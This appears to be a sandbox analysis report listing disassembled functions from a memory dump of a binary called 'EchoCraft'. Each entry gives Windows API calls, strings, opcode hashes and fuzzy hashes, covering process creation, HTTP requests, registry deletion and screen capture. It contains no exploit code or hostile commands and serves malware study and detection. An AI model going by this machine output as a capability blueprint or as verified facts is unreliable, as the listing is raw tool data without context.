LoadCursorW.USER32(00000000,00007F86), ref: 00B006D0
LoadCursorW.USER32(00000000,00007F83), ref: 00B006DB
LoadCursorW.USER32(00000000,00007F85), ref: 00B006E6
LoadCursorW.USER32(00000000,00007F82), ref: 00B006F1
LoadCursorW.USER32(00000000,00007F84), ref: 00B006FC
LoadCursorW.USER32(00000000,00007F04), ref: 00B00707
LoadCursorW.USER32(00000000,00007F02), ref: 00B00712
GetCursorInfo.USER32(?), ref: 00B00722
GetLastError.KERNEL32 ref: 00B00764

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 9ec2d2561c824c5c07ff0631161d6efee4986df58945c882b0fe92a6de04dd84
Instruction ID: ce0bf51549903cffcec54c701a73b5164fdb93ec52ea8e2c22e82715bf9aeca5
Opcode Fuzzy Hash: 9ec2d2561c824c5c07ff0631161d6efee4986df58945c882b0fe92a6de04dd84
Instruction Fuzzy Hash: 134154B0D083196ADB10DFBA8C8995EBFE8FF04354B50456AE11DE72C1DB78E9018F91

Function 00AA04E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00AA04E6

Part of subcall function 00AA050D: InitializeCriticalSectionAndSpinCount.KERNEL32(00B516FC,00000FA0,4C381B56,?,?,?,?,00AC27D3,000000FF), ref: 00AA053C
Part of subcall function 00AA050D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AC27D3,000000FF), ref: 00AA0547
Part of subcall function 00AA050D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AC27D3,000000FF), ref: 00AA0558
Part of subcall function 00AA050D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00AA056E
Part of subcall function 00AA050D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AA057C
Part of subcall function 00AA050D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AA058A
Part of subcall function 00AA050D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AA05B5
Part of subcall function 00AA050D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AA05C0

___scrt_fastfail.LIBCMT ref: 00AA0507

Part of subcall function 00AA04C3: __onexit.LIBCMT ref: 00AA04C9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AA0542
SleepConditionVariableCS, xrefs: 00AA0574
InitializeConditionVariable, xrefs: 00AA0568
WakeAllConditionVariable, xrefs: 00AA0582
kernel32.dll, xrefs: 00AA0553

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 2f3032efe815ead04e08d7d78c39b4b17b78a97c07ffcdc7f88cea759072220e
Instruction ID: 16ec1b2246e7870ff0eb730a7747ed621078c182b2ef3d1144615f20507da53f
Opcode Fuzzy Hash: 2f3032efe815ead04e08d7d78c39b4b17b78a97c07ffcdc7f88cea759072220e
Instruction Fuzzy Hash: DD212632A817127FD7112FA8AD05FAA37E4EB06B61F008565FD01A72D1DF749C008AA0

Function 00AE3901 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AE3997
_wcslen.LIBCMT ref: 00AE3A02

Strings

TEXT, xrefs: 00AE3C86
INSTANCE, xrefs: 00AE3C5D
CLASSNN, xrefs: 00AE39FD, 00AE3A0E
CLASS, xrefs: 00AE3992, 00AE39AF
REGEXPCLASS, xrefs: 00AE3A5F, 00AE3A70
NAME, xrefs: 00AE3B3F, 00AE3B50

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 6c47688498ea58a25339a6f1041018afc225e9dc4506cd6cdf11878c3187009f
Instruction ID: 80d79d97f0319b3149abd563c1d4725b97eac8283ef2c0e9a11afa0ca8336a33
Opcode Fuzzy Hash: 6c47688498ea58a25339a6f1041018afc225e9dc4506cd6cdf11878c3187009f
Instruction Fuzzy Hash: F4E10233A00556ABCF189F7AC8996FEFBB1FF44750F144529E456E7241DB30AE848B90

Function 00AF4DD7 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00B1DBF4), ref: 00AF4E3E
_wcslen.LIBCMT ref: 00AF4E52
_wcslen.LIBCMT ref: 00AF4EB0
_wcslen.LIBCMT ref: 00AF4F0B
_wcslen.LIBCMT ref: 00AF4F56
_wcslen.LIBCMT ref: 00AF4FBE

Part of subcall function 00A9FE52: _wcslen.LIBCMT ref: 00A9FE5D

GetDriveTypeW.KERNEL32(?,00B47BD0,00000061), ref: 00AF505A

Strings

cdrom, xrefs: 00AF4EA6, 00AF4EAB
all, xrefs: 00AF4E48, 00AF4E4D
network, xrefs: 00AF4FB4, 00AF4FB9
removable, xrefs: 00AF4F01, 00AF4F06
ramdisk, xrefs: 00AF5008
unknown, xrefs: 00AF501F
fixed, xrefs: 00AF4F4C, 00AF4F51

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: ea6eb25860447a62def80ed5b825061dd6ba0c4a28c73c7abae97f792656582a
Instruction ID: 092b1fc1c1cf9350dd4bd64e9d939686f44e716cd8df5894c381d39442e08601
Opcode Fuzzy Hash: ea6eb25860447a62def80ed5b825061dd6ba0c4a28c73c7abae97f792656582a
Instruction Fuzzy Hash: B2B1B231A083069FC710EF78C990A7BB7E5BF98724F50491DF69A87291DB30D944CBA2

Function 00B0B779 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B0B918
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B0B930
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B0B954
_wcslen.LIBCMT ref: 00B0B980
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B0B994
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B0B9B6
_wcslen.LIBCMT ref: 00B0BAB2

Part of subcall function 00AF0E01: GetStdHandle.KERNEL32(000000F6), ref: 00AF0E20

_wcslen.LIBCMT ref: 00B0BACB
_wcslen.LIBCMT ref: 00B0BAE6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B0BB36
GetLastError.KERNEL32(00000000), ref: 00B0BB87
CloseHandle.KERNEL32(?), ref: 00B0BBB9
CloseHandle.KERNEL32(00000000), ref: 00B0BBCA
CloseHandle.KERNEL32(00000000), ref: 00B0BBDC
CloseHandle.KERNEL32(00000000), ref: 00B0BBEE
CloseHandle.KERNEL32(?), ref: 00B0BC63

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 32b6143152dbc805a1592c8aacbb87575c33b1f5d256917a304b803776a8a655
Instruction ID: f1fb79c351489f5b2ec12160153b802b782561e011c9d5514c7ac85412b9df15
Opcode Fuzzy Hash: 32b6143152dbc805a1592c8aacbb87575c33b1f5d256917a304b803776a8a655
Instruction Fuzzy Hash: 12F157316043409FC715EF24C991E6ABBE5EF85310F14859DF89A9B2E2DB31ED44CB52

Function 00B047BC Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B1DBF4), ref: 00B0488E
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B048A0
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00B1DBF4), ref: 00B048C5
FreeLibrary.KERNEL32(00000000,?,00B1DBF4), ref: 00B04911
StringFromGUID2.OLE32(?,?,00000028,?,00B1DBF4), ref: 00B0497B
SysFreeString.OLEAUT32(00000009), ref: 00B04A35
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B04A9B
SysFreeString.OLEAUT32(?), ref: 00B04AC5

Strings

GetModuleHandleExW, xrefs: 00B0489A
kernel32.dll, xrefs: 00B04889

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: a2de61b5bcc46fed4274e27a12d2f0c13f8758c20335e32ba5e552fcd4e2d7bf
Instruction ID: 2a7efff8ab3913f5233355d5e0bfcac45418b3cdde4b9da0b644dfa3f429b11c
Opcode Fuzzy Hash: a2de61b5bcc46fed4274e27a12d2f0c13f8758c20335e32ba5e552fcd4e2d7bf
Instruction Fuzzy Hash: FA124FB1A00119EFDB14DF94C884EAEBBF5FF45314F148498EA069B291DB31ED46CBA0

Function 00B172C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00B173D2

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B17446
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B17468
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1747B
DestroyWindow.USER32(?), ref: 00B1749C
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A80000,00000000), ref: 00B174CB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B174E4
GetDesktopWindow.USER32 ref: 00B174FD
GetWindowRect.USER32(00000000), ref: 00B17504
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B1751C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B17534

Part of subcall function 00A82184: GetWindowLongW.USER32(?,000000EB), ref: 00A82192

Strings

0, xrefs: 00B1737F
tooltips_class32, xrefs: 00B1743F, 00B174C4

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: d310845b2f3edd05d095cb35f8bcca438adce701b21ab010aff1b80588d74c21
Instruction ID: 12b36cd1f83347c839bba1f5c311de3a84e861b085e0717804d6b9f6015f2795
Opcode Fuzzy Hash: d310845b2f3edd05d095cb35f8bcca438adce701b21ab010aff1b80588d74c21
Instruction Fuzzy Hash: C07167B0148344AFD725DF18C848BAABBF9FB99304F84459DF985872A1CB70A982DB51

Function 00B19726 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

DragQueryPoint.SHELL32(?,?), ref: 00B1974F

Part of subcall function 00B17C5B: ClientToScreen.USER32(?,?), ref: 00B17C81
Part of subcall function 00B17C5B: GetWindowRect.USER32(?,?), ref: 00B17CF7
Part of subcall function 00B17C5B: PtInRect.USER32(?,?,?), ref: 00B17D07

SendMessageW.USER32(?,000000B0,?,?), ref: 00B197B8
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B197C3
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B197E6
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B1982D
SendMessageW.USER32(?,000000B0,?,?), ref: 00B19846
SendMessageW.USER32(?,000000B1,?,?), ref: 00B1985D
SendMessageW.USER32(?,000000B1,?,?), ref: 00B1987F
DragFinish.SHELL32(?), ref: 00B19886
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00B19979

Strings

@GUI_DROPID, xrefs: 00B198A6
@GUI_DRAGFILE, xrefs: 00B19928
@GUI_DRAGID, xrefs: 00B198F1

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 9e81e9f0bd1f246c384120eb02a0eaa1fd3d636ea19695f8f39272474ac54976
Instruction ID: 033e28259f1653849cf3efd0796a1a5a726fad2c2a7a3777786e09468cbd3a8c
Opcode Fuzzy Hash: 9e81e9f0bd1f246c384120eb02a0eaa1fd3d636ea19695f8f39272474ac54976
Instruction Fuzzy Hash: 16615971508340AFC701EF60DC85E9FBBE8EF89750F40495EF592932A1DB70AA49CB62

Function 00AFCCA9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AFCCE3
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00AFCCF6
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00AFCD0A
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AFCD23
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00AFCD66
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AFCD7C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AFCD87
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AFCDB7
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00AFCE0F
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00AFCE23
InternetCloseHandle.WININET(00000000), ref: 00AFCE2E

Strings

, xrefs: 00AFCDA8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: b0811ba8ff39702a0ecd517ddfcb94b908a88cd0312724edee5f49fc4b5fd420
Instruction ID: 273678d9951a7574d54ba2339c5f73066ca212d762a220286d89c0fff4fd088c
Opcode Fuzzy Hash: b0811ba8ff39702a0ecd517ddfcb94b908a88cd0312724edee5f49fc4b5fd420
Instruction Fuzzy Hash: 01511EB150060DBFDB219FA2CA48ABB7BBCFF08754F548419F64597150DB34DD449BA0

Function 00B18B77 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B16313,?,?), ref: 00B18B9A
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B16313,?,?,00000000,?), ref: 00B18BAA
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B16313,?,?,00000000,?), ref: 00B18BB5
CloseHandle.KERNEL32(00000000,?,?,?,?,00B16313,?,?,00000000,?), ref: 00B18BC2
GlobalLock.KERNEL32(00000000), ref: 00B18BD0
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B16313,?,?,00000000,?), ref: 00B18BDF
GlobalUnlock.KERNEL32(00000000), ref: 00B18BE8
CloseHandle.KERNEL32(00000000,?,?,?,?,00B16313,?,?,00000000,?), ref: 00B18BEF
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B16313,?,?,00000000,?), ref: 00B18C00
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B20BFC,?), ref: 00B18C19
GlobalFree.KERNEL32(00000000), ref: 00B18C29
GetObjectW.GDI32(00000000,00000018,?), ref: 00B18C49
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00B18C79
DeleteObject.GDI32(00000000), ref: 00B18CA1
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B18CB7

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 83e03cb2152c24e422f6a802e38bfff545534cc7e5fbcad4a58ebda1afe35afc
Instruction ID: f9634b12876b82fe8bf7dcb02c06b614365da7e0b4f0744648a4adf9478c56ed
Opcode Fuzzy Hash: 83e03cb2152c24e422f6a802e38bfff545534cc7e5fbcad4a58ebda1afe35afc
Instruction Fuzzy Hash: FA411875600208BFDB119F65DC88EEBBBB9FF89711F5080A8F916E7260DB719941CB60

Function 00B0BD8E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

Part of subcall function 00B0D11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0BE2E,?,?), ref: 00B0D138
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D174
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D1E2
Part of subcall function 00B0D11B: _wcslen.LIBCMT ref: 00B0D218

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0BE74
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0BEF2
RegDeleteValueW.ADVAPI32(?,?), ref: 00B0BF8A
RegCloseKey.ADVAPI32(?), ref: 00B0BFFE
RegCloseKey.ADVAPI32(?), ref: 00B0C01C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B0C072
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B0C084
RegDeleteKeyW.ADVAPI32(?,?), ref: 00B0C0A2
FreeLibrary.KERNEL32(00000000), ref: 00B0C103
RegCloseKey.ADVAPI32(00000000), ref: 00B0C114

Strings

advapi32.dll, xrefs: 00B0C06D
RegDeleteKeyExW, xrefs: 00B0C07E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: d5cbb78c2c6bb3ccf2b8890a2dba95a702a850c3c6cd94c59b50ee77b82f3e60
Instruction ID: f4776d354869b73e5cb2230ff4367467fdb706a23a7e1dc780e280a1d996c7b9
Opcode Fuzzy Hash: d5cbb78c2c6bb3ccf2b8890a2dba95a702a850c3c6cd94c59b50ee77b82f3e60
Instruction Fuzzy Hash: 9CC17A31204242AFC710EF24C895F6ABBE5FF48314F14859CE49A8B6E2DB75ED46CB91

Function 00B02D98 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B02E14
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B02E24
CreateCompatibleDC.GDI32(?), ref: 00B02E30
SelectObject.GDI32(00000000,?), ref: 00B02E3D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B02EA9
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B02EE8
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B02F0C
SelectObject.GDI32(?,?), ref: 00B02F14
DeleteObject.GDI32(?), ref: 00B02F1D
DeleteDC.GDI32(?), ref: 00B02F24
ReleaseDC.USER32(00000000,?), ref: 00B02F2F

Strings

(, xrefs: 00B02EC9

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 17f27a8fb1622acd84bcd99e791ac3558cdcac48c392a5b0e36ee646999ccf52
Instruction ID: 91616e141b2f1dc4dc60becb242398150e92dfba0771bdee4af41d0ee1d3c56e
Opcode Fuzzy Hash: 17f27a8fb1622acd84bcd99e791ac3558cdcac48c392a5b0e36ee646999ccf52
Instruction Fuzzy Hash: 1361C0B5D00219AFCF04CFA4D988EAEBBF6FF48310F208569E959A7250D774A951CF60

Function 00AE5162 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00AE519E
GetWindowTextW.USER32(?,?,00000400), ref: 00AE51E0
_wcslen.LIBCMT ref: 00AE51F1
CharUpperBuffW.USER32(?,00000000), ref: 00AE51FD
_wcsstr.LIBVCRUNTIME ref: 00AE5232
GetClassNameW.USER32(00000018,?,00000400), ref: 00AE526A
GetWindowTextW.USER32(?,?,00000400), ref: 00AE52A3
GetClassNameW.USER32(00000018,?,00000400), ref: 00AE52FD
GetClassNameW.USER32(?,?,00000400), ref: 00AE532F
GetWindowRect.USER32(?,?), ref: 00AE53A7

